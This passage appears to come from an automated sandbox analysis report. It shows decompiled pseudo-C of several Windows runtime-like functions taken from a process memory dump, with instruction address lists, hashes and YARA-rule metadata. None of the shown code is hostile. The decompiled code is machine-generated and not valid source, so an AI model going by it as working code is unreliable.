						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01159860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                      0x011951be
                                                      0x011951c3
                                                      0x011951c8
                                                      0x011951cd
                                                      0x011951d0
                                                      0x011951d3
                                                      0x011951d8
                                                      0x011951db
                                                      0x011951de
                                                      0x011951e0
                                                      0x011951e3
                                                      0x011951e6
                                                      0x011951e8
                                                      0x01195342
                                                      0x01195351
                                                      0x01195356
                                                      0x0119535a
                                                      0x01195360
                                                      0x01195363
                                                      0x01195366
                                                      0x01195369
                                                      0x01195369
                                                      0x0119536b
                                                      0x0119536b
                                                      0x01195370
                                                      0x011953a3
                                                      0x011953a4
                                                      0x011953a6
                                                      0x011953ab
                                                      0x011953ab
                                                      0x011953ae
                                                      0x011953ae
                                                      0x011953b5
                                                      0x011953bf
                                                      0x011953bf
                                                      0x01195375
                                                      0x01195396
                                                      0x011953a0
                                                      0x011953a0
                                                      0x00000000
                                                      0x01195396
                                                      0x01195377
                                                      0x01195379
                                                      0x0119537f
                                                      0x0119538c
                                                      0x01195390
                                                      0x00000000
                                                      0x01195390
                                                      0x011951ee
                                                      0x011951f1
                                                      0x01195301
                                                      0x01195310
                                                      0x01195315
                                                      0x01195318
                                                      0x0119531b
                                                      0x01195320
                                                      0x0119532e
                                                      0x01195331
                                                      0x00000000
                                                      0x01195331
                                                      0x01195328
                                                      0x01195329
                                                      0x00000000
                                                      0x01195329
                                                      0x011951fa
                                                      0x01195235
                                                      0x01195236
                                                      0x01195239
                                                      0x0119523f
                                                      0x01195240
                                                      0x01195241
                                                      0x01195242
                                                      0x01195246
                                                      0x01195247
                                                      0x0119524e
                                                      0x01195251
                                                      0x01195267
                                                      0x01195269
                                                      0x0119526e
                                                      0x0119527d
                                                      0x0119527e
                                                      0x01195281
                                                      0x01195282
                                                      0x01195287
                                                      0x01195288
                                                      0x0119528a
                                                      0x0119528f
                                                      0x01195294
                                                      0x00000000
                                                      0x00000000
                                                      0x0119529a
                                                      0x0119529c
                                                      0x0119529e
                                                      0x0119529e
                                                      0x011952a4
                                                      0x011952b0
                                                      0x00000000
                                                      0x00000000
                                                      0x011952ba
                                                      0x011952bc
                                                      0x011952bc
                                                      0x011952d4
                                                      0x011952d9
                                                      0x011952dc
                                                      0x011952e1
                                                      0x00000000
                                                      0x00000000
                                                      0x011952e7
                                                      0x011952f4
                                                      0x00000000
                                                      0x011952f4
                                                      0x01195270
                                                      0x00000000
                                                      0x01195270
                                                      0x011951fc
                                                      0x011951fd
                                                      0x01195202
                                                      0x01195203
                                                      0x01195205
                                                      0x0119520a
                                                      0x0119520f
                                                      0x00000000
                                                      0x00000000
                                                      0x0119521b
                                                      0x01195226
                                                      0x0119522b
                                                      0x0119521d
                                                      0x0119521d
                                                      0x01195222
                                                      0x01195222
                                                      0x0119522d
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Legacy$UEFI
                                                      • API String ID: 2994545307-634100481
                                                      • Opcode ID: b2968fa39208793c63adaf92b711e99415ecf2b3e1a1178f8132d34c9d95847d
                                                      • Instruction ID: 6ac1d5cc130fb72fdc0ca069b1f85d18e4a748ff717fb992e8d6a4366ded8b2c
                                                      • Opcode Fuzzy Hash: b2968fa39208793c63adaf92b711e99415ecf2b3e1a1178f8132d34c9d95847d
                                                      • Instruction Fuzzy Hash: B9518D71E04609DFDF69CFA8C940AADBBB9BF48704F14406EE669EB241D7719A00CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0113B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E0113B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x120d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01137D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E011E8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01159E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0115B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0115CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01137D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E011E8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0115AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1208628; // 0x0
								_v68 = _t77;
								_t78 =  *0x120862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1208628; // 0x0
							_t116 =  *0x120862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                      0x0113b94c
                                                      0x0113b956
                                                      0x0113b95c
                                                      0x0113b95e
                                                      0x0113b964
                                                      0x0113b969
                                                      0x0113b96d
                                                      0x0113b96d
                                                      0x0113b970
                                                      0x0113b974
                                                      0x0113b97a
                                                      0x0113badf
                                                      0x0113badf
                                                      0x0113bae2
                                                      0x0113bae4
                                                      0x0113bae6
                                                      0x0113baf0
                                                      0x01182cb8
                                                      0x0113baf6
                                                      0x0113baf6
                                                      0x0113baf6
                                                      0x0113bafd
                                                      0x0113bb1f
                                                      0x0113bb1f
                                                      0x0113baff
                                                      0x0113bb00
                                                      0x0113bb00
                                                      0x0113bb03
                                                      0x0113bb03
                                                      0x0113bacb
                                                      0x0113bacf
                                                      0x0113bad0
                                                      0x0113bad1
                                                      0x0113badc
                                                      0x0113badc
                                                      0x0113b980
                                                      0x0113b980
                                                      0x0113b988
                                                      0x0113b98b
                                                      0x0113b98d
                                                      0x0113b990
                                                      0x0113b993
                                                      0x0113b999
                                                      0x0113b99b
                                                      0x0113b9a1
                                                      0x0113b9a5
                                                      0x0113b9aa
                                                      0x0113b9b0
                                                      0x0113b9bb
                                                      0x0113b9c0
                                                      0x0113b9c3
                                                      0x0113b9ca
                                                      0x0113b9cc
                                                      0x0113b9cf
                                                      0x0113b9d3
                                                      0x0113b9d7
                                                      0x0113ba94
                                                      0x0113ba94
                                                      0x0113ba98
                                                      0x0113baa3
                                                      0x01182ccb
                                                      0x0113baa9
                                                      0x0113baa9
                                                      0x0113baa9
                                                      0x0113bab1
                                                      0x01182cd5
                                                      0x01182cdd
                                                      0x01182cdd
                                                      0x0113babb
                                                      0x0113babc
                                                      0x0113bac2
                                                      0x0113bac3
                                                      0x0113bac3
                                                      0x0113bac6
                                                      0x00000000
                                                      0x0113b9dd
                                                      0x0113b9dd
                                                      0x0113b9e7
                                                      0x0113b9e7
                                                      0x0113b9ec
                                                      0x0113b9ec
                                                      0x0113b9f1
                                                      0x0113b9f5
                                                      0x0113b9fa
                                                      0x0113ba00
                                                      0x0113ba0c
                                                      0x0113ba10
                                                      0x0113ba10
                                                      0x0113ba12
                                                      0x0113ba18
                                                      0x00000000
                                                      0x00000000
                                                      0x0113bb26
                                                      0x0113bb26
                                                      0x0113ba1e
                                                      0x0113ba1e
                                                      0x0113ba23
                                                      0x0113ba25
                                                      0x0113ba2c
                                                      0x0113ba30
                                                      0x0113ba35
                                                      0x0113ba35
                                                      0x0113ba41
                                                      0x0113ba46
                                                      0x0113ba4c
                                                      0x0113ba50
                                                      0x0113ba54
                                                      0x0113ba6a
                                                      0x0113ba6e
                                                      0x0113ba70
                                                      0x0113ba74
                                                      0x0113ba78
                                                      0x0113ba7a
                                                      0x0113ba7c
                                                      0x0113ba8e
                                                      0x0113ba90
                                                      0x0113ba92
                                                      0x0113bb14
                                                      0x0113bb14
                                                      0x0113bb16
                                                      0x0113bb16
                                                      0x00000000
                                                      0x0113ba7c
                                                      0x0113bb0a
                                                      0x0113bb0d
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0113bb0f

                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0113B9A5
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID:
                                                      • API String ID: 885266447-0
                                                      • Opcode ID: 4f48ef1e352b476ae2db14a2334042144d8e1a04eac461ae38bc1396575444fb
                                                      • Instruction ID: 4ae7e15b3c93c6444dd8ea93f8125f4b652eb96257e703b76c8bcc7e96bc6202
                                                      • Opcode Fuzzy Hash: 4f48ef1e352b476ae2db14a2334042144d8e1a04eac461ae38bc1396575444fb
                                                      • Instruction Fuzzy Hash: 185169B1A08701CFC729DF28C48092BBBE5FBC8614F15896EE99587349E730E844CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0111B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 78%
                                                      			E0111B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x11ef7a8);
				E0116D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0116D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0115D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0115F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0116DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0115B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0115B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0115E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0115A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                      0x0111b171
                                                      0x0111b171
                                                      0x0111b171
                                                      0x0111b171
                                                      0x0111b171
                                                      0x0111b176
                                                      0x0111b17b
                                                      0x0111b180
                                                      0x0111b186
                                                      0x0111b18f
                                                      0x0111b198
                                                      0x0111b1a4
                                                      0x0111b1aa
                                                      0x01174802
                                                      0x01174802
                                                      0x01174805
                                                      0x0117480c
                                                      0x0117480e
                                                      0x0111b1d1
                                                      0x0111b1d3
                                                      0x0111b1de
                                                      0x0111b1de
                                                      0x01174817
                                                      0x0117481e
                                                      0x01174820
                                                      0x01174822
                                                      0x01174822
                                                      0x01174824
                                                      0x01174824
                                                      0x0117482a
                                                      0x00000000
                                                      0x00000000
                                                      0x01174835
                                                      0x0117483a
                                                      0x0117483d
                                                      0x0117483f
                                                      0x01174842
                                                      0x01174842
                                                      0x01174842
                                                      0x01174846
                                                      0x0117484c
                                                      0x0117484e
                                                      0x01174851
                                                      0x01174851
                                                      0x01174853
                                                      0x01174854
                                                      0x01174854
                                                      0x01174858
                                                      0x0117485a
                                                      0x0117485a
                                                      0x0117485d
                                                      0x0117485f
                                                      0x01174861
                                                      0x01174861
                                                      0x01174866
                                                      0x0117486b
                                                      0x0117486e
                                                      0x01174871
                                                      0x01174876
                                                      0x01174876
                                                      0x01174878
                                                      0x0117487b
                                                      0x01174884
                                                      0x01174884
                                                      0x00000000
                                                      0x0117487d
                                                      0x0117487d
                                                      0x01174882
                                                      0x01174889
                                                      0x01174889
                                                      0x0117488f
                                                      0x01174891
                                                      0x011748e0
                                                      0x011748e2
                                                      0x011748e4
                                                      0x011748e4
                                                      0x011748e7
                                                      0x011748e7
                                                      0x011748ed
                                                      0x011748f4
                                                      0x011748f6
                                                      0x01174951
                                                      0x01174951
                                                      0x01174953
                                                      0x01174953
                                                      0x01174956
                                                      0x01174956
                                                      0x01174958
                                                      0x01174959
                                                      0x01174959
                                                      0x0117495d
                                                      0x0117495d
                                                      0x0117495f
                                                      0x0117495f
                                                      0x01174965
                                                      0x01174969
                                                      0x011749ba
                                                      0x011749ba
                                                      0x011749c1
                                                      0x011749c5
                                                      0x011749cc
                                                      0x011749d4
                                                      0x011749d7
                                                      0x011749da
                                                      0x011749e4
                                                      0x011749e5
                                                      0x011749f3
                                                      0x01174a02
                                                      0x00000000
                                                      0x01174a02
                                                      0x01174972
                                                      0x01174974
                                                      0x00000000
                                                      0x00000000
                                                      0x01174976
                                                      0x01174979
                                                      0x01174982
                                                      0x01174983
                                                      0x01174984
                                                      0x0117498b
                                                      0x0117498d
                                                      0x01174991
                                                      0x01174993
                                                      0x01174999
                                                      0x0117499d
                                                      0x011749a2
                                                      0x011749a2
                                                      0x011749a2
                                                      0x01174999
                                                      0x011749ac
                                                      0x00000000
                                                      0x011749b3
                                                      0x011748f8
                                                      0x011748fe
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x011748fe
                                                      0x01174895
                                                      0x0117489c
                                                      0x011748ad
                                                      0x011748b2
                                                      0x011748b5
                                                      0x011748b7
                                                      0x011748ba
                                                      0x011748bc
                                                      0x011748c6
                                                      0x011748c6
                                                      0x011748cb
                                                      0x011748d1
                                                      0x011748d4
                                                      0x011748d8
                                                      0x011748d8
                                                      0x00000000
                                                      0x011748d8
                                                      0x011748be
                                                      0x011748c0
                                                      0x00000000
                                                      0x00000000
                                                      0x011748c2
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x011748c4
                                                      0x00000000
                                                      0x01174882
                                                      0x0117487b
                                                      0x01174904
                                                      0x01174906
                                                      0x00000000
                                                      0x00000000
                                                      0x01174908
                                                      0x0117490e
                                                      0x00000000
                                                      0x00000000
                                                      0x01174910
                                                      0x01174917
                                                      0x01174917
                                                      0x00000000
                                                      0x01174917
                                                      0x0111b1ba
                                                      0x011747f9
                                                      0x011747fc
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x011747fc
                                                      0x0111b1c0
                                                      0x0111b1c0
                                                      0x0111b1c3
                                                      0x0111b1cb
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: _vswprintf_s
                                                      • String ID:
                                                      • API String ID: 677850445-0
                                                      • Opcode ID: 4863eaea83a086dc936a5052b579ba11468a2f006c87b1fdfee865e2b12a1538
                                                      • Instruction ID: fa9f333fb6cafa75c71540c3cdfde584928c5e25c85a7e18ee534339f4ea7fee
                                                      • Opcode Fuzzy Hash: 4863eaea83a086dc936a5052b579ba11468a2f006c87b1fdfee865e2b12a1538
                                                      • Instruction Fuzzy Hash: 3B51E171D0425ACFEF39CFA8C844BAEBBB0AF04714F2141A9D859AB782D7714941CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01142581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 81%
                                                      			E01142581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1546912016) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t240;
				signed int _t244;
				signed int _t246;
				signed int _t247;
				signed int _t250;
				signed int _t252;
				intOrPtr _t254;
				signed int _t257;
				signed int _t264;
				signed int _t267;
				signed int _t275;
				intOrPtr _t281;
				signed int _t283;
				signed int _t285;
				void* _t286;
				signed int _t287;
				unsigned int _t290;
				signed int _t294;
				void* _t295;
				signed int _t296;
				signed int _t300;
				intOrPtr _t312;
				signed int _t321;
				signed int _t323;
				signed int _t324;
				signed int _t328;
				signed int _t329;
				signed int _t334;
				signed int _t336;
				signed int _t339;
				signed int _t340;
				void* _t342;

				_t336 = _t339;
				_t340 = _t339 - 0x4c;
				_v8 =  *0x120d360 ^ _t336;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t328 = 0x120b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t290 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t281 = 0x48;
				_t310 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t321 = 0;
				_v37 = _t310;
				if(_v48 <= 0) {
					L16:
					_t45 = _t281 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t329 = 0xc0000106;
						goto L32;
					} else {
						_t328 = L01134620(_t290,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t281);
						_v52 = _t328;
						__eflags = _t328;
						if(_t328 == 0) {
							_t329 = 0xc0000017;
							goto L32;
						} else {
							 *(_t328 + 0x44) =  *(_t328 + 0x44) & 0x00000000;
							_t50 = _t328 + 0x48; // 0x48
							_t323 = _t50;
							_t310 = _v32;
							 *((intOrPtr*)(_t328 + 0x3c)) = _t281;
							_t283 = 0;
							 *((short*)(_t328 + 0x30)) = _v48;
							__eflags = _t310;
							if(_t310 != 0) {
								 *(_t328 + 0x18) = _t323;
								__eflags = _t310 - 0x1208478;
								 *_t328 = ((0 | _t310 == 0x01208478) - 0x00000001 & 0xfffffffb) + 7;
								E0115F3E0(_t323,  *((intOrPtr*)(_t310 + 4)),  *_t310 & 0x0000ffff);
								_t310 = _v32;
								_t340 = _t340 + 0xc;
								_t283 = 1;
								__eflags = _a8;
								_t323 = _t323 + (( *_t310 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t275 = E011A39F2(_t323);
									_t310 = _v32;
									_t323 = _t275;
								}
							}
							_t294 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t329 = _v68;
								__eflags = 0;
								 *((short*)(_t323 - 2)) = 0;
								goto L32;
							} else {
								_t285 = _t328 + _t283 * 4;
								_v56 = _t285;
								do {
									__eflags = _t310;
									if(_t310 != 0) {
										_t240 =  *(_v60 + _t294 * 4);
										__eflags = _t240;
										if(_t240 == 0) {
											goto L30;
										} else {
											__eflags = _t240 == 5;
											if(_t240 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t285 =  *(_v60 + _t294 * 4);
										 *(_t285 + 0x18) = _t323;
										_t244 =  *(_v60 + _t294 * 4);
										__eflags = _t244 - 8;
										if(_t244 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t244 * 4 +  &M01142959))) {
												case 0:
													__ax =  *0x1208488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0115F3E0(__edi,  *0x120848c, __ax & 0x0000ffff);
														__eax =  *0x1208488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0115F3E0(_t323, _v80, _v64);
													_t270 = _v64;
													goto L26;
												case 2:
													 *0x1208480 & 0x0000ffff = E0115F3E0(__edi,  *0x1208484,  *0x1208480 & 0x0000ffff);
													__eax =  *0x1208480 & 0x0000ffff;
													__eax = ( *0x1208480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0115F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
